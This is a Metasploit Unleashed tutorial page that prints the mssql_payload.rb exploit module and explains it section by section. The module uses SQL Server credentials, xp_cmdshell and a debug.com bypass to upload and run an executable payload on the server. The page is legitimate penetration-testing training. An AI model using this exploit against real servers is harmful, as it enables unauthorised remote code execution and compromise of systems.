Creating Our Auxiliary Module

From Metasploit Unleashed
Jump to: navigation, search

We will be looking at three different files, they should be relatively familar from prior sections.

/usr/share/metasploit-framework/lib/msf/core/exploit/mssql_commands.rb
/usr/share/metasploit-framework/lib/msf/core/exploit/mssql.rb
/usr/share/metasploit-framework/modules/exploits/windows/mssql/mssql_payload.rb

Lets first take a look at the 'mssql_payload.rb' as to get a better idea at what we will be working with.

##
# $Id: mssql_payload.rb 7236 2009-10-23 19:15:32Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::MSSQL
def initialize(info = {})

super(update_info(info,
'Name' => 'Microsoft SQL Server Payload Execution',
'Description' => %q{
This module will execute an arbitrary payload on a Microsoft SQL
Server, using the Windows debug.com method for writing an executable to disk
and the xp_cmdshell stored procedure. File size restrictions are avoided by
incorporating the debug bypass method presented at Defcon 17 by SecureState.
Note that this module will leave a metasploit payload in the Windows
System32 directory which must be manually deleted once the attack is completed.
},
'Author' => [ 'David Kennedy "ReL1K"
'License' => MSF_LICENSE,
'Version' => '$Revision: 7236 $',
'References' =>
[
[ 'OSVDB', '557'],
[ 'CVE', '2000-0402'],
[ 'BID', '1281'],
[ 'URL', 'http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf'],
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0
))
end

def exploit

debug = false # enable to see the output

if(not mssql_login_datastore)
print_status("Invalid SQL Server credentials")
return
end

mssql_upload_exec(Msf::Util::EXE.to_win32pe(framework,payload.encoded), debug)

handler
disconnect
end

While this file may seem simple, there is actually a lot of going on behind the scenes. Lets break down this file and look at the different sections. Specifically we are calling from the mssql.rb in the lib/msf/core/exploits area.
One of the first things that is done in this file is the importation of the Remote class, and inclusion of the MSSQL module.

class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::MSSQL


The reference section simply enumerates additional information concerning the attack or the initial exploit proof of concept. This is where we would find OSVDB references, EDB references and so on.

'References' =>
	[
	[ 'OSVDB', '557'],
	[ 'CVE', '2000-0402'],
	[ 'BID', '1281'],
	[ 'URL', 'http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf'],
],

The platform section indicates the target's platform and version. The following part is the 'Targets' object, which is where different versions would be enumerated. These lines give the user the ability to select a target prior to an attack. The 'DefaultTarget' value is used when no target is specified when setting up the attack.

'Platform' => 'win',
'Targets' =>
	[
	[ 'Automatic', { } ],
],
'DefaultTarget' => 0


The 'def exploit' line indicates the beginning of our exploit code. The next declaration is for debugging purposes. Considering there is a lot of information going back and forth, it's a good idea having this set to 'false' until it's needed.

debug = false # enable to see the output

Moving on to the next line, this is the most complex portion of the entire attack. This one liner here is really multiple lines of code being pulled from mssql.rb.

mssql_upload_exec(Msf::Util::EXE.to_win32pe(framework,payload.encoded), debug)

mssql_upload_exec (function defined in mssql.rb for uploading an executable through SQL to the underlying operating system)

Msf::Util::EXE.to_win32pe(framework,payload.encoded) = create a metasploit payload based off of what you specified, make it an executable and encode it with default encoding

debug = call the debug function is it on or off?

Lastly the handler will handle the connections from the payload in the background so we can accept a metasploit payload. The disconnect portion of the code ceases the connection from the MSSQL server. Now that we have walked through this portion, we will break down the next section in the mssql.rb to find out exactly what this attack was doing.



MSF Extended Usage > Building A Module > Creating Our Auxiliary Module

Payloads Through MSSQL | Creating Our Auxiliary Module | The Guts Behind It